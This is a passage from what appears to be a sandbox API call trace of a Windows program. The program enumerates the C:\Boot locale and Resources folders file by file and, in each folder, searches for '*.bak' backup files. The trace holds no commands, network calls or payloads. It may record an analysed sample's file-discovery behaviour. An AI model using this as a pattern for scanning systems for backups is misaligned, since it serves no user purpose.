lpFileName="C:\\Boot\\nl-NL\\*", lpFindFileData=0x1aeef4 | out: lpFindFileData=0x1aeef4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a1cf69, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0156.122] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a1cf69, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.122] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x211543da, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13160, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.122] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb158, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0156.122] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb158, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0156.122] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0156.122] FindFirstFileW (in: lpFileName="C:\\Boot\\nl-NL\\*.bak", lpFindFileData=0x1aef34 | out: lpFindFileData=0x1aef34*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0156.123] FindFirstFileW (in: lpFileName="C:\\Boot\\pl-PL\\*", lpFindFileData=0x1aeef4 | out: lpFindFileData=0x1aeef4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a4324e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0156.124] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a4324e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.124] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2112e17f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f58, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.124] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21212f9a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb360, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0156.124] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21212f9a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb360, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0156.124] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0156.124] FindFirstFileW (in: lpFileName="C:\\Boot\\pl-PL\\*.bak", lpFindFileData=0x1aef34 | out: lpFindFileData=0x1aef34*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0156.125] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-BR\\*", lpFindFileData=0x1aeef4 | out: lpFindFileData=0x1aeef4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a4324e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0156.125] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a4324e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.125] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2112e17f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.125] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21212f9a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb160, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0156.125] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21212f9a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb160, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0156.125] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0156.125] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-BR\\*.bak", lpFindFileData=0x1aef34 | out: lpFindFileData=0x1aef34*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0156.126] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-PT\\*", lpFindFileData=0x1aeef4 | out: lpFindFileData=0x1aeef4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a4324e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0156.127] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a4324e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.127] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2112e17f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.127] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21212f9a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb358, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0156.127] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21212f9a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb358, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0156.127] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0156.127] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-PT\\*.bak", lpFindFileData=0x1aef34 | out: lpFindFileData=0x1aef34*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0156.127] FindFirstFileW (in: lpFileName="C:\\Boot\\qps-ploc\\*", lpFindFileData=0x1aeef4 | out: lpFindFileData=0x1aeef4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a4324e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0156.128] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a4324e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.128] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12160, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.129] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2117a634, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xaf60, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0156.129] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2117a634, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xaf60, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0156.129] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0156.129] FindFirstFileW (in: lpFileName="C:\\Boot\\qps-ploc\\*.bak", lpFindFileData=0x1aef34 | out: lpFindFileData=0x1aef34*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0156.129] FindFirstFileW (in: lpFileName="C:\\Boot\\Resources\\*", lpFindFileData=0x1aeef4 | out: lpFindFileData=0x1aeef4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78b27f82, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78b27f82, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0156.130] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78b27f82, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78b27f82, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.130] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78b27f82, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootres.dll", cAlternateFileName="")) returned 1 [0156.130] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78b27f82, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78b27f82, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0156.130] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78b27f82, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78b27f82, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 0 [0156.130] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0156.130] FindFirstFileW (in: lpFileName="C:\\Boot\\Resources\\*.bak", lpFindFileData=0x1aef34 | out: lpFindFileData=0x1aef34*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0156.131] FindFirstFileW (in: lpFileName="C:\\Boot\\Resources\\en-US\\*", lpFindFileData=0x1aeef4 | out: lpFindFileData=0x1aeef4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78b27f82, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78b27f82, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7375a8 [0156.131] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78b27f82, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78b27f82, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.131] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78b27f82, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x9ea99bcf, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x3160, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootres.dll.mui", cAlternateFileName="BOOTRE~1.MUI")) returned 1 [0156.131] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78b27f82, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x9ea99bcf, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x3160, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootres.dll.mui", cAlternateFileName="BOOTRE~1.MUI")) returned 0 [0156.131] FindClose (in: hFindFile=0x7375a8 | out: hFindFile=0x7375a8) returned 1 [0156.131] FindFirstFileW (in: lpFileName="C:\\Boot\\Resources\\en-US\\*.bak", lpFindFileData=0x1aef34 | out: lpFindFileData=0x1aef34*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0156.131] FindFirstFileW (in: lpFileName="C:\\Boot\\ro-RO\\*", lpFindFileData=0x1aeef4 | out: lpFindFileData=0x1aeef4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a4324e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0156.132] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a4324e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.132] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12960, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.132] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12960, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0156.133] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0156.133] FindFirstFileW (in: lpFileName="C:\\Boot\\ro-RO\\*.bak", lpFindFileData=0x1aef34 | out: lpFindFileData=0x1aef34*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0156.133] FindFirstFileW (in: lpFileName="C:\\Boot\\ru-RU\\*", lpFindFileData=0x1aeef4 | out: 